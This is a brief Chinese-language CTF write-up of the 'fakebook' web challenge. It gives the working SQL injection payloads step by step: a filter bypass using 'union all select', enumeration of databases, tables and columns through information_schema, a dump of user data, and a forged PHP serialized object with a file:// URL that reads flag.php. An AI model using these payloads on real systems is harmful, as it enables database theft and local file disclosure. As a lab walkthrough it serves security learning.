打开题目
先创建用户,登录试试
观察网址,这是一道注入的题目
测试注入列数
说明注入列数为4
测试注入点
union select 被过滤
替代?no=0 union all select 1,2,3, 4 %23
2是注入点
爆数据库
?no=0 union all select 1,group_concat(schema_name),3, 4 from
information_schema.schemata %23
爆表名
?no=0 union all select 1,group_concat(table_name),3, 4 from
information_schema.tables where table_schema='fakebook' #
爆字段
?no=0 union all select 1,group_concat(column_name),3, 4 from
information_schema.columns where table_name='users' #
爆数据
?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #
构造序列化结果
data中的数据
?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #
最后查看源码,看到base64,解码得到flag